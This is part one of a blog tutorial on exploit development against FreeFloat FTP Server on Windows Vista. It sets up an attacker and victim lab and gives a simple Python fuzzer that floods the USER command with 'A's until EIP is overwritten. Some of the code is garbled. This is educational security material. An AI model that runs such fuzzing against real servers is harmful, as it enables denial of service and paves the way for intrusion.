A FreeFloat FTP Server Buffer Overflow Vulnerability for the Metasploit Framework was released on 07/07/2011 on the Exploit Database (www.exploit-db.com/exploits/17498). The description noted that the exploit works on Win XP SP3 Eng. I tried it on my XP SP3 setup but it didn't work. I downloaded an earlier exploit (www.exploit-db.com/exploits/15689) and that didn't work too. I then decided that I might as well "re-discover" the exploit. Since the exploit for XP SP3 has already been done (despite it not working for me), I will do a run-through for Win Vista Business. The same approach can be taken for XP SP2, SP3, etc. Unfortunately, for Win 7, while the fuzzing part and the loading of the shell code works, I believe the DEP prevents the exploit from executing.
Anyway, I will probably divide this walkthrough into 3 parts. This first part will focus on fuzzing. The second part will probably focus on controlling the EIP and the last on the loading of the shellcode and executing of the exploit. A few points to note: 1. I will try to keep this walkthrough as simple and as "fundamental" as possible, hopefully to help rookies (like me!) get their feet wet in writing exploits. If you prefer more details, there are several good tutorials out there e.g. Peter van Eeckhoutte's website. 2. I will try to avoid the use of Metasploit, specifically the use of msfconsole. That said, I will still use pattern_create, pattern_offset, msfpayload and msfencode, so that we can focus more on the exploit process and less on assembly language, the compiler, the linker, etc. 3. This tutorial is meant for educational purposes only. Test the exploit only on computer networks you own.
1. Some knowledge of Python 2. Some familiarity with ollydbg 3. A little knowledge of the FTP protocol 4. A little knowledge of assembly language e.g. what registers EIP, ESP are, commands like JMP ESP 5. Some knowledge of how the stack works 6. A little knowledge of "little-endian" 7. A little knowledge of Hex values e.g. x41 --> "A" 8. A little knowledge of opcodes e.g. x90 --> No Operation (NOP) 9. Familiarity with Linux
You also require two machines, or virtual machines. My set-up is as follows: Attacker (192.168.1.7): Linux with python2.7 installed Victim (192.168.1.4): Win Vista Business with Ollydbg 1.10 and FreeFloat FTP Server installed.
Note that you can download the FreeFloat program from the exploit-db links above. Both Ollydbg 1.10 and 2.00 can be used. The same exploit writing process can be applied to other Vista and XP versions as well, although you may need to tweak the code a bit.
================================================== 3. Creating a Very Basic Fuzzer
First, run ollydbg on the Victim's computer. Then open the FreeFloat FTP program from within ollydbg. Press F9 to run the FTP program.
Now, let's build a very basic fuzzer to fuzz the program with varying lengths of "AAAAA..." as our Username
#!/usr/bin/python2.7 # fuzzer.py - An extremely simple fuzzer import sys import socket import time
for length in lengths: #I am having problems with indentation for the submission. The whole block of code below should be indented. fuzz = "x41" * length #set fuzz to a different length of 'A's each loop sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #create a TCP socket connect = sock.connect((target_addr, target_port)) sock.recv(1024) #receive the Welcome text from the FTP server print "Sending", length, "'A's" sock.send("USER " + fuzz + "rn")   ; #send USER AAAAA... sock.close() print length, "'A's sentn" time.sleep(0.5)
================================================= 4. Running the Fuzzer
Now, make your fuzzer.py file executable, and run it. You should get something similar to the following:
# ./fuzzer.py 192.168.1.4 21 Sending 4096 'A's 4096 'A's sent
Sending 4097 'A's 4097 'A's sent
Sending 1025 'A's 1025 'A's sent
Sending 2048 'A's 2048 'A's sent
Sending 2049 'A's 2049 'A's sent
Sending 129 'A's 129 'A's sent
Sending 128 'A's 128 'A's sent
Sending 127 'A's 127 'A's sent
Sending 257 'A's 257 'A's sent
For me, the program 'hangs' after sending out 257 'A's. It may differ slightly for you, but the figure should be between 200+ to ~1000. More importantly, take a look at the top right window of ollydbg, which shows the registers. Look at the value of EIP, which holds the address of the instruction to be executed - it is 41414141 or AAAA! 4 bytes from our string of 'A's has overwritten the EIP and there's a chance we can control the execution of the FTP program.
Before moving on to the next part on Controlling the EIP, try to tweak the lengths in fuzzer.py to find out approximate maximum length of 'A's that will 'hang' the FTP program and overwrite the EIP with 41414141. For Vista, it should be around 1000. You will probably need to restart the FTP program in ollydbg. Do so by keying in Crtl-F2, followed by F9.
I will stop here for now. Part 2 on Controlling the EIP will hopefully be up by next week. (The exploit is quick to write but typing up a tutorial takes a while!)